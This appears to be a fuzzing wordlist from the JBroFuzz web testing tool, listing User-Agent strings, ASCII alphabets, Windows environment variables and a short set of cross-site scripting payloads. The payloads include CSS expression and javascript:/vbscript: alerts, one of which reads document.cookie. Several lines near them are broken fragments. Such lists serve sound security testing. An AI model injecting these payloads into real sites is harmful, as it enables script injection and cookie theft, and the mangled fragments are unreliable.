User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20
User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
User-Agent: Opera/9.27 (Windows NT 5.1; U; en)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
User-Agent: Wget/1.8.2
User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
R:045-A85-RFC:ASCII 85 Alphabet:85
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> RFC 1924: Published on April 1, 1996, presumably not meant to be taken too seriously
0
1
2
3
4
5
6
7
8
9
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
!
#
$
%
&
(
)
*
+
-
;
<
=
>
?
@
^
_
`
{
|
}
~
.
R:046-A94-CHR:ASCII 94 Alphabet:94
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> The 94 (95 minus one, the space) printable ASCII characters, numbered from 33 to 126 (decimal)
!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
[
\
]
^
_
`
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
|
}
~
R:047-A95-CHR:ASCII 95 Alphabet:95
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> The 95 printable ASCII characters, numbered from 32 to 126 (decimal)
!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
[
\
]
^
_
`
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
|
}
~
P:048-WIN-VAR:Windows Environment Variables:26
> O/S Variables | Replacive Fuzzers
>> XP, Vista, 7 Special variable aliases or placeholders for basic system properties
%ALLUSERSPROFILE%
%APPDATA%
%COMPUTERNAME%
%COMSPEC%
%HOMEDRIVE%
%HOMEPATH%
%PATH%
%PATHEXT%
%PROGRAMFILES%
%PROMPT%
%SYSTEMDRIVE%
%SYSTEMROOT%
%TEMP%
%TMP%
%USERNAME%
%USERPROFILE%
%WINDIR%
%DATE%
%TIME%
%CD%
%ERRORLEVEL%
%RANDOM%
%CommonProgramFiles%
%LOCALAPPDATA%
%ProgramData%
%Public%
style=color: expression(alert(0));" a="
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
;)
;)
![](`javascript:alert("RSnake)
)
![](javascript:alert("XSS"))
))
![](vbscript:msgbox("XSS"))
;)
)
![](`javascript:alert("XSS)
))
;)
;)
;)
P:024-XSS-NET:ASP .NET validateRequest:5
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
)